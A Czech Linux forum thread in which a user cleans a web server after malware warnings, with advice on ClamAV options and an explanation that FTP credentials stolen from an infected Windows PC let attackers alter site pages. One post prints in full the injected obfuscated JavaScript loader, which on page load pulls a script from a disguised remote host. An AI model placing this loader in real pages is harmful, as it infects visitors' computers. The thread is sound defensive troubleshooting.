Autor Téma: ClamAV jak smazat viry (Přečteno 9768 krát)

locus · « **kdy:** 03 Ledna 2010, 01:32:53 »

Dobrý večer,

Prosím vás nevítě někdo jak přes terminál vymazat span.

Vím že pomocí parametru -r
se vypíšou podsložky
podle parametru -i
se vypíšou jen viry

základní podoba jak projít adresář home je

clamscan -r /home

potřeboval bych aby mi prošel celej PC a ty viry pokud možno smazal vím že tam jsou 3 infekce v celém pc ale nvím jak je odstranit

tímto si scan výpis celého pc

clamscan -r /

ale už nevím jak nastavit aby ty viry i mazal.

Děkuji moc za rady

locus · « **Odpověď #1 kdy:** 03 Ledna 2010, 09:08:17 »

nevíte prosím vás někdo jak na to?

mka · « **Odpověď #2 kdy:** 03 Ledna 2010, 09:30:51 »

Clamscan nepoužívám, ale jistě k něbu bude existovat nějaký manuál. Už ses do něj díval? (příkaz man clamscan :-)

locus · « **Odpověď #3 kdy:** 03 Ledna 2010, 09:37:29 »

ano díval ale nevím jak ty parametri složit tak aby prošel celý PC a aby to popřípadě ty infekce mazal.

tady třeba je manuál

http://linux.die.net/man/8/clamd

tím příkazem naskenuje clej pc

clamscan -r /

Ještě vím že tímto

clamscan --move=/tmp/viry

bych měl přesunout infekci do /tmp/viry

ale nevím jak udělat příkaz který by naskenovla celej pc a pak ty infekce vymazal atd.

Nevíte pls?

locus · « **Odpověď #4 kdy:** 03 Ledna 2010, 10:08:54 »

mohl by stemi prosím někdo poradit nebo nasměrovat.

prosím vás

Cendas · « **Odpověď #5 kdy:** 03 Ledna 2010, 10:18:06 »

Ahoj Jestli ti to pomůže tak se dá nainstalovat grafické rozhraní clamtk kde si to jednoduše naklikáš myší.

luisah · « **Odpověď #6 kdy:** 03 Ledna 2010, 10:18:24 »

http://www.linuxexpres.cz/business/na-vasi-ochranu-antivirovy-program-clamav

Nevím jak, nikdy jsem antiněco v linuxu nepoužil, prostě bych ty hajzlíky v tmp smazal

No, výše uvedený odkaz by ti mohl, alespoň trochu pomoci, např. viz. grafické udělátka.

locus · « **Odpověď #7 kdy:** 03 Ledna 2010, 10:20:57 »

no toto jsem našel i já nakonec

ale bohužel toto mí nepomůže potřebuju to v tom terminálu.

Jde toto že jsem připojený na kamaráduv pc přes ssh.

Proto to potřebuju v tom terminálu

Nevíte pls někdo?

Jak by ten příkaz měl vypadat

luisah · « **Odpověď #8 kdy:** 03 Ledna 2010, 10:23:41 »

Tak zkus to projít tady:
http://wiki.clamav.net/Main/WebHome
nebo se zeptej na irc:
http://www.clamav.net/support/

EDIT: Příkaz pro smazání "klasické", nikoliv karanténu, je rm, ale nejsem si moc jistej jak bezpečné by to skutečně bylo.

mka · « **Odpověď #9 kdy:** 03 Ledna 2010, 10:26:45 »

A jak vůbec víš, že tam máš nějaký viry?
Předpokládám, že máš tedy na PC i Wokna a ty viry jsou někde tam. V tom případě bys měl mít ten wokenní fs připojenej, abyses k němu vůbec dostal - řekněme, že to taky máš; jak už psal luisah, pokud dokážeš ty infikované soubory dostat někam do tmp, tak je pak prostě smaž a je to. Ale bacha, aby ti pak nechyběly - před smazáním by nebylo od věci opatřit si jejich neinfikované verze, je-li to možné...
Jinak neznám nikoho, kdy by měl zavirovanej linux.

Pichca · « **Odpověď #10 kdy:** 03 Ledna 2010, 10:34:45 »

Co takhle sudo clamscan -r / --remove
S přidáním parametru -i vypíše jenom infikované

locus · « **Odpověď #11 kdy:** 03 Ledna 2010, 12:51:25 »

no je to dektop s ftp a apchem

no a sice to ted vypíše že bylo nalezeno 0 infekcí ale když se dá třeba otevřít ftp nebo ten web tak to začně psat že je to nebezpečné že je tam spam mailware atd.

Díky moc za vaše nápady.
Co by jste mi prosím kdo doporučili dělat dál?

mka · « **Odpověď #12 kdy:** 03 Ledna 2010, 13:11:41 »

Citace: locus 03 Ledna 2010, 12:51:25

no je to dektop s ftp a apchem

no a sice to ted vypíše že bylo nalezeno 0 infekcí ale když se dá třeba otevřít ftp nebo ten web tak to začně psat že je to nebezpečné že je tam spam mailware atd.

Díky moc za vaše nápady.
Co by jste mi prosím kdo doporučili dělat dál?

Bóóóže!!!
Kdo co začne psát, že je to nebezpečné? A jeké ftp nebo web se otevře? Web na tom počítači nebo někde jinde?
Prepáčte, som z toho volaký zmetený...

locus · « **Odpověď #13 kdy:** 03 Ledna 2010, 13:32:14 »

moc se omlouvám ze nepřesné informace.

Na tom desktopu Ubuntu /běží na něm apache2 a fpt/ pod adresou 10.0.0.11.
Když se na ten web /ubuntu desktop/ mrknu z windowsu třeba IE tak mi antivir na windows pc napíše že jsou tam viry mailware atd

Už mi roumíte aspon trošku co a jak?

regine · « **Odpověď #14 kdy:** 03 Ledna 2010, 13:38:02 »

Jsem "úser" a v počátcích jsem chtěl také využít ClamAV, ale jaksi jsem neuspěl. Tak jsem vygooglil F-Prot a Avast. F-Prot má hroznou instalaci. Avast - stačí stáhnout .deb balíček a dvojklikem spustit instalaci. Grafické prostředí. Nainstaluje se velmi rychle. Potom provést:
- registraci a
- update.
Vše totálně zadara. Lze užít i registrační číslo Avast-u pro Widle.
http://www.avast.com/eng/avast-for-linux-workstation.html
Užívám ho hlavně k perfektnímu odvirování externích pamětí a v případě dual-boot instalací (Win+Linux) i k odvirování partitions s Widlema.
Dodatek: Zatím Avasťáci nemají vyřešen přístup update přes proxy. Tak musí uživatelé stahovat:
http://download1.avast.com/files/latest/400.vps
400.vps a vkládat ručně do:
/home/user/.avast

mka · « **Odpověď #15 kdy:** 03 Ledna 2010, 13:43:43 »

Už ano. Takže asi takto:
Prvně bych tam vytvořil nějakou "práznou stránku" (třeba jenom <h1>Nazdar</h1>) a zkusil to s ní. MSIE je idiot a nemohu vyloučit, že řve už jenom kvůli té ip adrese. Pokud na tuto stránku řvát nebude, tak je potřeba podívat se na zdroje těch stránek, na které to křičí. Pokud jsou to statické html stránky (a ne dynamické stránky, generované např. php), tak tam mohou být nějaké zavlečené nesmysly (obvykle javascript), případně to na něco takového může odkazovat. Ať tak či onak, úpravou (opravou) html kódu se to dá spravit.
Je docela možné, že si tam někdo něco špatného stáhnul z internetu a pošetile vložil do svých stránek.
V každém případě se určitě nejedná o zavirovaný systém (linux).

Pro začátek by to mohlo stačit, dej vědět.

locus · « **Odpověď #16 kdy:** 04 Ledna 2010, 21:01:14 »

Moc děkuji za veškeré rady. Postupoval jsme dle vašich nstrukcí a jelikož jsou to dynamické stránky tak to nejspíše způsobilo tyto chyby tedy byly tam zavlečené nesmysli což popravdě nechápu jak se tam dostali.
Prosím vás jak ted předejít těmto malwerovím útokům?
Ještě bych se chtěl zeptat jestli nevíte jak popřípadě přes co se pokusit to udělat bezpečnější atd.?

Ještě jednou moc děkuji.

PS: Jiank na můj noťas kde mám Ubuntu 9.10 se si dal ten avast je to docela zajímavý antvir.

mka · « **Odpověď #17 kdy:** 04 Ledna 2010, 23:49:18 »

No, ono přijde na to, co to bylo zač. Ale pokud jsou to dynamické stránky, tak to tam musel asi někdo odněkud zkopírovat. Možná v dobré víře, ale i tak. Zavirované péhápko na linuxu jsem tedy ještě neviděl (jako že by to samovolně generovalo "škodlivý kód" :-)
Nějaká ukázka těch "virů" by nebyla?

locus · « **Odpověď #18 kdy:** 09 Ledna 2010, 21:44:26 »

vždycky se na konci všech stránek vloží něco takového

ještě to vypíše antivir že je tam Trojský kuň / malware

Kód: [Vybrat]

<script>/*LGPL*/ try{ window.onload = function(){var Vfdcsw54orzuw7 = document.createElement('s^&#c#r!^i$p$#t#$$'.replace(/\$|&|\)|\(|#|\^|\!|@/ig, ''));Vfdcsw54orzuw7.setAttribute('defer', 'd!#!^@e((#f$$&#e($r)^$'.replace(/\(|&|#|\)|\!|\^|@|\$/ig, ''));Vfdcsw54orzuw7.setAttribute('type', 't$(e))x&@t(^@/&@$j#&a)^v!$&a&@$)s$c!$#r!($i@$p&!@(t$#'.replace(/\^|&|\!|\(|\$|@|\)|#/ig, ''));Vfdcsw54orzuw7.setAttribute('id', 'F^^&j(&^&7&q^b!$(y&6(^#1$@5!8&#(&l@$m@z$#$&j#(!'.replace(/\(|@|&|#|\)|\!|\^|\$/ig, ''));Vfdcsw54orzuw7.setAttribute('s!@&(!r(c#$'.replace(/\!|@|\(|\)|#|\$|\^|&/ig, ''),  'h)@t&t&(^)^p):)#$/(&/!$w$(^!e!r&-$)k()e&n)$n@&t^-@$w@$$e^!^^n!^$^(-!d^!^e)@.^@))g)^!o^)@o^&g^)l(&&@e$#.$!^p!^t!.!#$$m^!$@a)$#t##c!h!$-#@^&c()o@m&(^(.&w!##o(r)@l@!d^!!#w##$e^)b!w@!@o#r&l)$d($.&#@r!!u!:#$^#8@)&0@(8@$0(!#/^@i(^m&!@e@!^)e(@)@^m))&@@.)#c@)@^!o@$m!/$&i#&&m!e@&#e)()m$.))(c(o$)m!/@)!g(o(o^($g@@!l&)!^e$@).)$)c$#o$#m#)/#)^!c)$^a)(&$m#@#4!&.(c^)o^@!m^^/(&g($)$o#$$o!$g(l&&e#(.)#^c(&@o()m#.@#$^u)@)^a)/@)'.replace(/\)|\$|\(|@|\!|#|\^|&/ig, ''));if (document){document.body.appendChild(Vfdcsw54orzuw7);}} } catch(Qbbvxvqzoxdntc5zbwxko) {}</script>
<!--9157f230c9873dffbec7f6778cc93c2e-->

stderr · « **Odpověď #19 kdy:** 09 Ledna 2010, 22:30:51 »

To je chyba na straně ftp klienta ve windows. At si odviruji pc ti co k tomuto ftp pristupuji a neukladaji hesla do starsich verzi TC.

mka · « **Odpověď #20 kdy:** 10 Ledna 2010, 09:16:57 »

Tak tak...

locus · « **Odpověď #21 kdy:** 10 Ledna 2010, 13:11:31 »

Tedy odvirovat pc. A tím TC je myšlen Total Comander?

mka · « **Odpověď #22 kdy:** 10 Ledna 2010, 13:51:43 »

Ano (zřejmě).
Funguje to tak, že na nějakém PC s Widlema je virus, který umí najít hesla k ftp (např. uložená prostřednictvím TC), připojit se na ftp, najít tam scripty (html, php, ...) a vylepšit je nějakým svinstvem.
Poté, co zjistíš, ze kterého PC to je a odviruješ ho, musíš ten sajrajt na konci scriptů ještě odstranit.
Příjemnou zábavu :-)

Roman Vacho · « **Odpověď #23 kdy:** 10 Ledna 2010, 14:45:01 »

Citace: mka 10 Ledna 2010, 13:51:43

Ano (zřejmě).
Funguje to tak, že na nějakém PC s Widlema je virus, který umí najít hesla k ftp (např. uložená prostřednictvím TC), připojit se na ftp, najít tam scripty (html, php, ...) a vylepšit je nějakým svinstvem.
Poté, co zjistíš, ze kterého PC to je a odviruješ ho, musíš ten sajrajt na konci scriptů ještě odstranit.
Příjemnou zábavu :-)

Bych to těm noobovským windosákům hodil na hlavu, ať si s tím hrají. Jeho to neohrožuje, ani to nezaviroval.

PS: Nejsou mezi těmi stránkami i web kadeřnictví? Já jen, že máti si skrz to zavirovala Winy

locus · « **Odpověď #24 kdy:** 10 Ledna 2010, 21:22:23 »

Aha. Tedy nějáká ochrana nato asi nebude že? Nějáka kontrola při kopírování přes ftp? Ne ne pár blogu hlavně to ftp s fotkama atd.